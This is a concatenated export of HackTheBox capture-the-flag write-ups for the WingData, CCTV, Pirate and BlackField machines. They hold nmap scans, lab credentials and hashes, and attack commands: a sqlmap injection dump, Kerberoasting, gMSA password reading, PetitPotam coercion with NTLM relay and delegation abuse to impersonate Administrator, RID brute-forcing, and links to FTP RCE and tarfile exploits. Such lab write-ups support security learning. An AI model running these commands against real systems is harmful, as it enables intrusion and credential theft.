9c:ba:21:1a:97:2f:3a:64:73:c1:4c:1d:ce:65:7a:2f (ED25519) **80/tcp open http Apache httpd 2.4.66 |_http-title: Did not follow redirect to http://wingdata.htb/** |_http-server-header: Apache/2.4.66 (Debian) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), MikroTik RouterOS 7.X (95%) OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:6.0 Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (97%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (95%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%), Linux 3.4 - 3.10 (91%), Linux 2.6.32 - 3.10 (91%), Linux 4.19 - 5.15 (91%), 
Linux 4.15 (90%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 104.67 ms 10.10.14.1 2 104.69 ms 10.129.244.106 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.30 seconds Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nlets add this to our hosts\nftp # I validated this step using the evidence below before moving forward in the chain.\nExploitation # Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)\nhttps://www.exploit-db.com/exploits/52347\nwhen trying to revshell thru this it keep dying so lets use this other poc\nhttps://github.com/estebanzarate/CVE-2025-47812-Wing-FTP-Server-7.4.3-Unauthenticated-RCE-PoC\nusing nc we were able to change our shell\nIN_ACCOUNTS Description=\u0026#34;Wing FTP Server Admin Accounts\u0026#34;\u0026gt; \u0026lt;ADMIN\u0026gt; \u0026lt;Admin_Name\u0026gt;admin\u0026lt;/Admin_Name\u0026gt; \u0026lt;Password\u0026gt;a8339f8e4465a9c47158394d8efe7cc45a5f361ab983844c8562bef2193bafba\u0026lt;/Password\u0026gt; \u0026lt;Type\u0026gt;0\u0026lt;/Type\u0026gt; \u0026lt;Readonly\u0026gt;0\u0026lt;/Readonly\u0026gt; ServerPassword\u0026gt;2D35A8D420A697203D7C554A678F8119\u0026lt;/ServerPassword\u0026gt; lets check this out\nhttps://www.hooperlabs.xyz/disclosures/cve-2020-9470.php\nhmm lets see if we grab anything interesting from linpeas output\n/opt/wftpserver/Data/1/groups /opt/wftpserver/Data/1/portlistener.xml /opt/wftpserver/Data/1/settings.xml /opt/wftpserver/Data/1/users /opt/wftpserver/Data/1/users/anonymous.xml /opt/wftpserver/Data/1/users/john.xml /opt/wftpserver/Data/1/users/maria.xml /opt/wftpserver/Data/1/users/steve.xml **/opt/wftpserver/Data/1/users/wacky.xml --\u0026gt; wacky is another 
user on this machine opt/wftpserver/Log/Admin /opt/wftpserver/Log/Admin/Admin-2025-11-2.log /opt/wftpserver/Log/Admin/Admin-2025-11-3.log /opt/wftpserver/Log/Admin/Admin-2026-1-12.log /opt/wftpserver/Log/Admin/Admin-2026-1-14.log /opt/wftpserver/Log/Admin/Admin-2026-1-20.log /opt/wftpserver/Log/Domains/1/2026-3-9.log /opt/wftpserver/Log/Domains/1/2026-2-9.log.zip /opt/wftpserver/Log/System/System-2026-2-9.log /opt/wftpserver/Log/System/System-2026-3-9.log /tmp/linpeas.sh** anony: d67f86152e5c4df1b0ac4a18d3ca4a89c1b12e6b748ed71d01aeb92341927bca john: c1f14672feec3bba27231048271fcdcddeb9d75ef79f6889139aa78c9d398f10 maria: a70221f33a51dca76dfd46c17ab17116a97823caf40aeecfbc611cae47421b03 steve: 5916c7481fa2f20bd86f4bdb900f0342359ec19a77b7e3ae118f3b5d0d3334ca wacky: 32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca on cracking the hash with WingFTP as the salt\n!#7Blushing^*Bride5\nwe get this as the password\nPassword \u0026amp; Security\u0026quot; settings to harden the hashing process. Variable Salt (%Name): The system allows the use of the variable %Name as a salt, which dynamically replaces the salt with the specific username for each user. Default Salt Behavior: In some contexts, particularly for administrative users, a default salt (e.g., \u0026ldquo;WingFTP\u0026rdquo;) may be used, resulting in hashes like SHA256(Password+\u0026ldquo;WingFTP\u0026rdquo;). 
Storage: The hashed passwords (often SHA-256) are typically stored in XML configuration files.\nLet\u0026rsquo;s get an SSH shell now\n#!/usr/bin/env python3\nimport tarfile\nimport os\nimport sys\nimport re\nimport argparse\n\nBACKUP_BASE_DIR = \u0026#34;/opt/backup_clients/backups\u0026#34;\nSTAGING_BASE = \u0026#34;/opt/backup_clients/restored_backups\u0026#34;\n\ndef validate_backup_name(filename):\n    if not re.fullmatch(r\u0026#34;^backup_\\d+\\.tar$\u0026#34;, filename):\n        return False\n    client_id = filename.split(\u0026#39;_\u0026#39;)[1].rstrip(\u0026#39;.tar\u0026#39;)\n    return client_id.isdigit() and client_id != \u0026#34;0\u0026#34;\n\ndef validate_restore_tag(tag):\n    return bool(re.fullmatch(r\u0026#34;^[a-zA-Z0-9_]{1,24}$\u0026#34;, tag))\n\ndef main():\n    parser = argparse.ArgumentParser(\n        description=\u0026#34;Restore client configuration from a validated backup tarball.\u0026#34;,\n        epilog=\u0026#34;Example: sudo %(prog)s -b backup_1001.tar -r restore_john\u0026#34;\n    )\n    parser.add_argument(\n        \u0026#34;-b\u0026#34;, \u0026#34;--backup\u0026#34;, required=True,\n        help=\u0026#34;Backup filename (must be in /home/wacky/backup_clients/ and match backup_\u0026lt;client_id\u0026gt;.tar, \u0026#34;\n             \u0026#34;where \u0026lt;client_id\u0026gt; is a positive integer, e.g., backup_1001.tar)\u0026#34;\n    )\n    parser.add_argument(\n        \u0026#34;-r\u0026#34;, \u0026#34;--restore-dir\u0026#34;, required=True,\n        help=\u0026#34;Staging directory name for the restore operation. \u0026#34;\n             \u0026#34;Must follow the format: restore_\u0026lt;client_user\u0026gt; (e.g., restore_john). \u0026#34;\n             \u0026#34;Only alphanumeric characters and underscores are allowed in the \u0026lt;client_user\u0026gt; part (1–24 characters).\u0026#34;\n    )\n    args = parser.parse_args()\n\n    if not validate_backup_name(args.backup):\n        print(\u0026#34;[!] Invalid backup name. Expected format: backup_\u0026lt;client_id\u0026gt;.tar (e.g., backup_1001.tar)\u0026#34;, file=sys.stderr)\n        sys.exit(1)\n    backup_path = os.path.join(BACKUP_BASE_DIR, args.backup)\n    if not os.path.isfile(backup_path):\n        print(f\u0026#34;[!] Backup file not found: {backup_path}\u0026#34;, file=sys.stderr)\n        sys.exit(1)\n    if not args.restore_dir.startswith(\u0026#34;restore_\u0026#34;):\n        print(\u0026#34;[!] --restore-dir must start with \u0026#39;restore_\u0026#39;\u0026#34;, file=sys.stderr)\n        sys.exit(1)\n    tag = args.restore_dir[8:]\n    if not tag:\n        print(\u0026#34;[!] --restore-dir must include a non-empty tag after \u0026#39;restore_\u0026#39;\u0026#34;, file=sys.stderr)\n        sys.exit(1)\n    if not validate_restore_tag(tag):\n        print(\u0026#34;[!] Restore tag must be 1–24 characters long and contain only letters, digits, or underscores\u0026#34;, file=sys.stderr)\n        sys.exit(1)\n\n    staging_dir = os.path.join(STAGING_BASE, args.restore_dir)\n    print(f\u0026#34;[+] Backup: {args.backup}\u0026#34;)\n    print(f\u0026#34;[+] Staging directory: {staging_dir}\u0026#34;)\n    os.makedirs(staging_dir, exist_ok=True)\n    try:\n        with tarfile.open(backup_path, \u0026#34;r\u0026#34;) as tar:\n            tar.extractall(path=staging_dir, filter=\u0026#34;data\u0026#34;)\n        print(f\u0026#34;[+] Extraction completed in {staging_dir}\u0026#34;)\n    except (tarfile.TarError, OSError, Exception) as e:\n        print(f\u0026#34;[!] Error during extraction: {e}\u0026#34;, file=sys.stderr)\n        sys.exit(2)\n\nif __name__ == \u0026#34;__main__\u0026#34;:\n    main()\nhttps://github.com/AzureADTrent/CVE-2025-4517-POC-HTB-WingData\n","date":"9 March 2026","externalUrl":null,"permalink":"/ctf-writeups/wingdata/","section":"CTF Writeups","summary":"","title":"WingData","type":"ctf-writeups"},{"content":" CCTV # Overview # OS: Linux IP: 10.129.3.60 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # Time-based SQLi gave SSH creds, and then RCE via a public exploit.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # └─$ nmap cctv.htb -sU --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-08 08:05 EDT Nmap scan report for cctv.htb (10.129.3.60) Host is up (0.12s latency). Not shown: 994 open|filtered udp ports (no-response) PORT STATE SERVICE 1066/udp closed fpo-fns 9370/udp closed unknown 16545/udp closed unknown 17332/udp closed unknown 21320/udp closed unknown 34758/udp closed unknown nmap cctv.htb -sCV -A -p- -Pn --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-08 08:05 EDT Warning: 10.129.3.60 giving up on port because retransmission cap hit (10). Nmap scan report for cctv.htb (10.129.3.60) Host is up (0.12s latency). 
Not shown: 62846 closed tcp ports (reset), 2687 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |_ 256 76:1d:73:98:fa:05:f7:0b:04:c2:3b:c4:7d:e6:db:4a (ECDSA) 80/tcp open http Apache httpd 2.4.58 |_http-title: SecureVision CCTV \u0026amp; Security Solutions Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 2 hops Service Info: Host: default; OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 3389/tcp) HOP RTT ADDRESS 1 115.60 ms 10.10.14.1 2 116.15 ms cctv.htb (10.129.3.60) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 82.54 seconds Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nThe login page takes us here\nSurprisingly, a simple admin:admin gets us in\nExploitation # Visiting this forum\nhttps://forums.zoneminder.com/viewtopic.php?t=1029\ntells us the DB structure, so we can enumerate more efficiently now\nsqlmap -u \u0026#34;http://cctv.htb/zm/index.php?view=request\u0026amp;request=event\u0026amp;action=removetag\u0026amp;tid=1\u0026#34; \\ --cookie=\u0026#34;ZMSESSID=6lkqf49jhdfdo1l4nplp9m9o5\u0026#34; \\ -D zm -T Users -C Username,Password \\ --where=\u0026#34;Username=\u0026#39;mark\u0026#39;\u0026#34; \\ --dump --threads 10 --batch and the password we get is opensesame\nA bunch of ports are running here\nIt seems to be running motion 4.7.1\ngrep -R \u0026#34;7999\\|8888\\|8765\\|9081\\|8554\\|1935\u0026#34; /etc 2\u0026gt;/dev/null grep -R \u0026#34;3306\\|mysql\u0026#34; /etc 2\u0026gt;/dev/null and we have motioneye; let\u0026rsquo;s check its config and port-forward the 
webportal\nwe have admin username as admin\nand password\n989c5a8ee87a0e9521ec81a79187d162109282f0\nlets follow this now\nafter bypassing client side verif in the console we can\nand this should give us our reverse shell\n","date":"8 March 2026","externalUrl":null,"permalink":"/ctf-writeups/cctv/","section":"CTF Writeups","summary":"","title":"CCTV","type":"ctf-writeups"},{"content":" Pirate # Overview # OS: Windows AD IP: 10.129.3.153 Difficulty: Hard Platform: HackTheBox OSCP: No Lists: N/A Summary # season.\nLoot # Loot Category Details Usernames pentest Passwords p3nt3st2025!\u0026amp; Usernames+Passwords pentest / p3nt3st2025!\u0026amp; Hashes Service Versions Enumeration # As is common in real life pentests, you will start the Pirate box with credentials for the following account pentest / p3nt3st2025!\u0026amp;\nNmap # ─$ nmap 10.129.3.153 -sCV -A -p- -Pn --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-08 15:07 EDT Nmap scan report for 10.129.3.153 Host is up (0.11s latency). Not shown: 65512 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus **80/tcp open http Microsoft IIS httpd 10.0** | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-09 02:08:20Z) **135/tcp open msrpc Microsoft Windows RPC** 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.pirate.htb **| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:\u0026lt;unsupported\u0026gt;, DNS:DC01.pirate.htb** | Not valid before: 2025-06-09T14:05:15 |_Not valid after: 2026-06-09T14:05:15 |_ssl-date: 2026-03-09T02:10:01+00:00; +7h00m00s from scanner time. 443/tcp open https? 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: **pirate.htb0**., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.pirate.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:\u0026lt;unsupported\u0026gt;, DNS:DC01.pirate.htb | Not valid before: 2025-06-09T14:05:15 |_Not valid after: 2026-06-09T14:05:15 |_ssl-date: 2026-03-09T02:10:02+00:00; +7h00m00s from scanner time. 2179/tcp open vmrdp? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.pirate.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:\u0026lt;unsupported\u0026gt;, DNS:DC01.pirate.htb | Not valid before: 2025-06-09T14:05:15 |_Not valid after: 2026-06-09T14:05:15 |_ssl-date: 2026-03-09T02:10:01+00:00; +7h00m00s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb0., Site: Default-First-Site-Name) |_ssl-date: 2026-03-09T02:10:02+00:00; +7h00m00s from scanner time. 
| ssl-cert: Subject: commonName=DC01.pirate.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:\u0026lt;unsupported\u0026gt;, DNS:DC01.pirate.htb | Not valid before: 2025-06-09T14:05:15 |_Not valid after: 2026-06-09T14:05:15 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found **9389/tcp open mc-nmf .NET Message Framing** 49667/tcp open msrpc Microsoft Windows RPC 49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49686/tcp open msrpc Microsoft Windows RPC 49688/tcp open msrpc Microsoft Windows RPC 49689/tcp open msrpc Microsoft Windows RPC 49914/tcp open msrpc Microsoft Windows RPC 51252/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (97%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2026-03-09T02:09:22 |_ start_date: N/A TRACEROUTE (using port 139/tcp) HOP RTT ADDRESS 1 110.11 ms 10.10.14.1 2 110.45 ms 10.129.3.153 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 127.25 seconds SMB # There seems to be no password reuse right now\nNo WinRM either as pirate\nRoasting # Kerberoast\n*] sAMAccountName: a.white_adm, memberOf: CN=IT,CN=Users,DC=pirate,DC=htb, pwdLastSet: 2026-01-15 19:36:34.388000, lastLogon: 2025-06-09 12:03:37.380258 LDAP 10.129.3.153 389 DC01 $krb5tgs$23$*a.white_adm$PIRATE.HTB$pirate.htb\\a.white_adm*$b62e426cdc4343942624834383c86190$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 LDAP 10.129.3.153 389 DC01 [*] sAMAccountName: gMSA_ADFS_prod$, memberOf: CN=Remote Management Users,CN=Builtin,DC=pirate,DC=htb, pwdLastSet: 2025-06-09 10:48:41.108220, lastLogon: 2026-03-08 22:07:52.081087 LDAP 10.129.3.153 389 DC01 $krb5tgs$18$gMSA_ADFS_prod$$PIRATE.HTB$*pirate.htb\\gMSA_ADFS_prod$*$ee63da1c6b849c412012a42d$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 On kerberoasting we got the hash of the gMSA_ADFS$ machine account, which is part of Remote Management Users, and of a.white_adm, a service account that is part of the IT group\nLet\u0026rsquo;s crack the password\nasreproast\nNothing while cracking either, and BloodHound fails both ways (with nxc and with python), so let\u0026rsquo;s try Apache Studio and see if there is anything\nDirbusting # Port 80 # Exploitation # On further enumeration of groups\nMATCH (g:Group) RETURN g we come across this pre-Windows 2000 group\nOn searching online, apparently pre-Windows 2000 machine accounts sometimes have the same password as their SPN but in lowercase\nLet\u0026rsquo;s try getting in as MS01 and reading the gMSA password\nMS01$ / ms01\nWindows Pre2k # The password is the same name in lowercase without the $\nKerberos does allow machine accounts, so it successfully issued a TGT and saved:\nGrab the ticket\n└─$ impacket-getTGT pirate.htb/MS01$:ms01 -dc-ip 10.129.3.153 export KRB5CCNAME=MS01$.ccache bloodyAD --host DC01.pirate.htb -d pirate.htb -u MS01$ -k get object \u0026#34;gMSA_ADFS_prod$\u0026#34; --attr msDS-ManagedPassword and boom, we should have the NTLM hash for 
gMSA_ADFS_prod$\naad3b435b51404eeaad3b435b51404ee:fd9ea7ac7820dba5155bd6ed2d850c09 let's add to owned in bh\nthere is an internal network 192.168.100.1\nPivot # let's set up ligolo\nnow we can scan that network\nfor i in {1..254}; do (ping -c 1 192.168.100.$i | grep \u0026#34;bytes from\u0026#34; \u0026amp;); done nmap -A nslookup WEB01.pirate.htb 10.129.3.153 WEB-01 # nslookup gives us the ip as 192.168.100.2\nnow that we have access to this machine's network let's try that ntlm relay and coerce this machine into connecting to us\npython3 PetitPotam.py -u \u0026#39;pentest\u0026#39; -p \u0026#39;p3nt3st\u0026#39; -d pirate.htb 10.10.14.82 192.168.100.2 and boom we got ourselves in\nisoned. [SMB] NTLMv1-SSP Client : 10.129.3.153 [SMB] NTLMv1-SSP Username : PIRATE\\WEB01$ [SMB] NTLMv1-SSP Hash : WEB01$::PIRATE:85B423B8FFA6B86300000000000000000000000000000000:1BA6BDB65B8434C7578893E959DE85AAE415A59B3579479B:b66c2c62a5c339cc [SMB] NTLMv2-SSP Client : 10.129.3.153 [SMB] NTLMv2-SSP Username : PIRATE\\DC01$ [SMB] NTLMv2-SSP Hash : DC01$::PIRATE:4a48f82be880c97b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ukw let's just go the route with ntlmrelay because that will help us do the rbcd easier\nsudo impacket-ntlmrelayx -t ldaps://10.129.5.228 --delegate-access -smb2support --remove-mic and now\npython3 PetitPotam.py -u \u0026#39;pentest\u0026#39; -p \u0026#39;p3nt3st2025!\u0026amp;\u0026#39; -d pirate.htb 10.10.14.82 192.168.100.2 rgets left! [*] ldaps://PIRATE/WEB01$@pirate.htb [1] -\u0026gt; Attempting to create computer in: CN=Computers,DC=pirate,DC=htb [*] ldaps://PIRATE/WEB01$@pirate.htb [1] -\u0026gt; Adding new computer with username: ECEGKABB$ and password: p0\u0026gt;pbp$iwJ##ah^ result: OK [*] ldaps://PIRATE/WEB01$@pirate.htb [1] -\u0026gt; Delegation rights modified succesfully! 
[*] ldaps://PIRATE/WEB01$@pirate.htb [1] -\u0026gt; ECEGKABB$ can now impersonate users on WEB01$ via S4U2Proxy so we have a computer now with\nECEGKABB$ and password: p0\u0026gt;pbp$iwJ##ah^\nnow let's get the Admin ticket for WEB01\n─$ impacket-getST \u0026#39;pirate.htb/ECEGKABB$:p0\u0026gt;pbp$iwJ##ah^\u0026#39; \\ -spn cifs/WEB01.pirate.htb \\ -impersonate Administrator \\ -dc-ip 10.129.3.153 Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] CCache file is not found. Skipping... [*] Getting TGT for user [*] Impersonating Administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in Administrator@cifs_WEB01.pirate.htb@PIRATE.HTB.ccache ","date":"8 March 2026","externalUrl":null,"permalink":"/ctf-writeups/pirate/","section":"CTF Writeups","summary":"","title":"Pirate","type":"ctf-writeups"},{"content":" BlackField # Overview # OS: Windows IP: 10.129.1.58 Difficulty: Hard Platform: HackTheBox OSCP: Yes Lists: N/A Summary # found users through rid brute with guest access, asreproasted found creds, force changed creds for audit acc, access forensics share, dumped lsass found creds for service account, winrm as service and dumped ntds system and sam, found creds for Administrator.\nLoot # Loot Category Details Usernames support Passwords #00^BlackKnight Usernames+Passwords support: #00^BlackKnight audit2020:Password@123 | | Hashes | | | Service Versions | |\nEnumeration # Nmap # Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-06 07:55 EST Nmap scan report for 10.129.1.58 Host is up (0.11s latency). 
Not shown: 65527 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain (generic dns response: SERVFAIL) | fingerprint-strings: | DNS-SD-TCP: | _services | _dns-sd | _udp |_ local 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-06 19:56:06Z) 135/tcp open msrpc Microsoft Windows RPC 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) **5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)** |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.95%I=7%D=3/6%Time=69AACEF5%P=x86_64-pc-linux-gnu%r(DNS-S SF:D-TCP,30,\u0026#34;\\0\\.\\0\\0\\x80\\x82\\0\\x01\\0\\0\\0\\0\\0\\0\\t_services\\x07_dns-sd\\x04_ SF:udp\\x05local\\0\\0\\x0c\\0\\x01\u0026#34;); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (97%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (90%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: 6h59m58s | smb2-time: | date: 2026-03-06T19:56:35 |_ start_date: N/A TRACEROUTE (using port 445/tcp) HOP RTT ADDRESS 1 112.72 ms 10.10.14.1 2 112.80 ms 10.129.1.58 OS and Service detection performed. 
Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 79.87 seconds Dirbusting # nothing interesting AT ALL Port 80 # Nothing\nno subdomains either w wfuzz\nSMB # We have guest access lets try bruteforcing the RID\nnetexec smb blackfield.local -u \u0026#39;guest\u0026#39; -p \u0026#39;\u0026#39; --rid-brute | grep \u0026#34;SidTypeUser\u0026#34; | awk -F\u0026#39;\\\\\u0026#39; \u0026#39;{print $2}\u0026#39; | awk \u0026#39;{print $1}\u0026#39; \u0026gt; users.txt Administrator Guest krbtgt DC01$ audit2020 support BLACKFIELD764430 BLACKFIELD538365 BLACKFIELD189208 BLACKFIELD404458 BLACKFIELD706381 BLACKFIELD937395 BLACKFIELD553715 BLACKFIELD840481 BLACKFIELD622501 BLACKFIELD787464 BLACKFIELD163183 BLACKFIELD869335 BLACKFIELD319016 BLACKFIELD600999 BLACKFIELD894905 BLACKFIELD253541 BLACKFIELD175204 BLACKFIELD727512 BLACKFIELD227380 BLACKFIELD251003 BLACKFIELD129328 BLACKFIELD616527 BLACKFIELD533551 BLACKFIELD883784 BLACKFIELD908329 BLACKFIELD601590 BLACKFIELD573498 BLACKFIELD290325 BLACKFIELD775986 BLACKFIELD348433 BLACKFIELD196444 BLACKFIELD137694 BLACKFIELD533886 BLACKFIELD268320 BLACKFIELD909590 BLACKFIELD136813 BLACKFIELD358090 BLACKFIELD561870 BLACKFIELD269538 BLACKFIELD169035 BLACKFIELD118321 BLACKFIELD592556 BLACKFIELD618519 BLACKFIELD329802 BLACKFIELD753480 BLACKFIELD837541 BLACKFIELD186980 BLACKFIELD419600 BLACKFIELD220786 BLACKFIELD767820 BLACKFIELD549571 BLACKFIELD411740 BLACKFIELD768095 BLACKFIELD835725 BLACKFIELD251977 BLACKFIELD430864 BLACKFIELD413242 BLACKFIELD464763 BLACKFIELD266096 BLACKFIELD334058 BLACKFIELD404213 BLACKFIELD219324 BLACKFIELD412798 BLACKFIELD441593 BLACKFIELD606328 BLACKFIELD796301 BLACKFIELD415829 BLACKFIELD820995 BLACKFIELD695166 BLACKFIELD759042 BLACKFIELD607290 BLACKFIELD229506 BLACKFIELD256791 BLACKFIELD997545 BLACKFIELD114762 BLACKFIELD321206 BLACKFIELD195757 BLACKFIELD877328 BLACKFIELD446463 BLACKFIELD579980 BLACKFIELD775126 BLACKFIELD429587 BLACKFIELD534956 
BLACKFIELD315276 BLACKFIELD995218 BLACKFIELD843883 BLACKFIELD876916 BLACKFIELD382769 BLACKFIELD194732 BLACKFIELD191416 BLACKFIELD932709 BLACKFIELD546640 BLACKFIELD569313 BLACKFIELD744790 BLACKFIELD739659 BLACKFIELD926559 BLACKFIELD969352 BLACKFIELD253047 BLACKFIELD899433 BLACKFIELD606964 BLACKFIELD385719 BLACKFIELD838710 BLACKFIELD608914 BLACKFIELD569653 BLACKFIELD759079 BLACKFIELD488531 BLACKFIELD160610 BLACKFIELD586934 BLACKFIELD819822 BLACKFIELD739765 BLACKFIELD875008 BLACKFIELD441759 BLACKFIELD763893 BLACKFIELD713470 BLACKFIELD131771 BLACKFIELD793029 BLACKFIELD694429 BLACKFIELD802251 BLACKFIELD602567 BLACKFIELD328983 BLACKFIELD990638 BLACKFIELD350809 BLACKFIELD405242 BLACKFIELD267457 BLACKFIELD686428 BLACKFIELD478828 BLACKFIELD129387 BLACKFIELD544934 BLACKFIELD115148 BLACKFIELD753537 BLACKFIELD416532 BLACKFIELD680939 BLACKFIELD732035 BLACKFIELD522135 BLACKFIELD773423 BLACKFIELD371669 BLACKFIELD252379 BLACKFIELD828826 BLACKFIELD548394 BLACKFIELD611993 BLACKFIELD192642 BLACKFIELD106360 BLACKFIELD939243 BLACKFIELD230515 BLACKFIELD774376 BLACKFIELD576233 BLACKFIELD676303 BLACKFIELD673073 BLACKFIELD558867 BLACKFIELD184482 BLACKFIELD724669 BLACKFIELD765350 BLACKFIELD411132 BLACKFIELD128775 BLACKFIELD704154 BLACKFIELD107197 BLACKFIELD994577 BLACKFIELD683323 BLACKFIELD433476 BLACKFIELD644281 BLACKFIELD195953 BLACKFIELD868068 BLACKFIELD690642 BLACKFIELD465267 BLACKFIELD199889 BLACKFIELD468839 BLACKFIELD348835 BLACKFIELD624385 BLACKFIELD818863 BLACKFIELD939200 BLACKFIELD135990 BLACKFIELD484290 BLACKFIELD898237 BLACKFIELD773118 BLACKFIELD148067 BLACKFIELD390179 BLACKFIELD359278 BLACKFIELD375924 BLACKFIELD533060 BLACKFIELD534196 BLACKFIELD639103 BLACKFIELD933887 BLACKFIELD907614 BLACKFIELD991588 BLACKFIELD781404 BLACKFIELD787995 BLACKFIELD911926 BLACKFIELD146200 BLACKFIELD826622 BLACKFIELD171624 BLACKFIELD497216 BLACKFIELD839613 BLACKFIELD428532 BLACKFIELD697473 BLACKFIELD291678 BLACKFIELD623122 BLACKFIELD765982 BLACKFIELD701303 BLACKFIELD250576 BLACKFIELD971417 
